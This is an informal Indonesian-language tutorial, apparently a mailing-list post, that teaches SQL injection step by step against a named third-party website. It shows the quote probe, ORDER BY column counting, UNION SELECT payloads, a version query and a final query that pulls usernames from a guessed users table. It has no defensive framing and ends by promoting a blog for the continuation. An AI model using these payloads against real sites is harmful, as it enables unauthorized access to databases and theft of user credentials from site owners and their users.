Tool :1. Mozilla, IE
2. Komputer yang konek ke internet
Perlengkapan laen (gak wajib) :1. Secangkir kopi
2. Foto cewek cakep di samping komputer...
3. Keuletan....
1. Cari target
Contoh targer:contoh: http://taseen.com.my/news/news.php?id=3
2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://taseen.com.my/news/news.php?id=3'
Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe
3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah =
silahkan tambahkan -
jadi urlnya:contoh: http://taseen.com.my/news/news.php?id=-3
Sekarang silahkan kasi order ampe ketemu error....
Contoh:
http://taseen.com.my/news/news.php?id=3 order by 1/* <---- gak ada eror
http://taseen.com.my/news/news.php?id=3 order by 2/* <---- gak ada eror
http://taseen.com.my/news/news.php?id=3 order by 3/* <---- gak ada eror
http://taseen.com.my/news/news.php?id=3 order by 4/* <---- gak ada eror
http://taseen.com.my/news/news.php?id=3 order by 5/* <---- ada eror
bahwa web tersebut punya 4 colom....
4 Sekarang masukkan perintah unoin all select 1,2,3,4/* <<<--- serupakan colom
yang ada dallam web tersebut contoh: http://taseen.com.my/news/news.php?id=-3
union all select 1,2,3,4/*
Maka akan keluar angka , misal angka yang keluar adalah 3 ,Angka yang keluar
pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version
untuk mengecek versi
5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d,
user_is, username, password, pass dll
Sekarang kita coba username
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,username,4 from
users/* jreng jreng...... usernya keliatan.......
MAU TAU KELANJUTANNYA???? KLIK AJA http://a-dwisatya.blogspot.com/
___________________________________________________________________________
Dapatkan alamat Email baru Anda!
Dapatkan nama yang selalu Anda inginkan sebelum diambil orang lain!
http://mail.promotions.yahoo.com/newdomains/id/
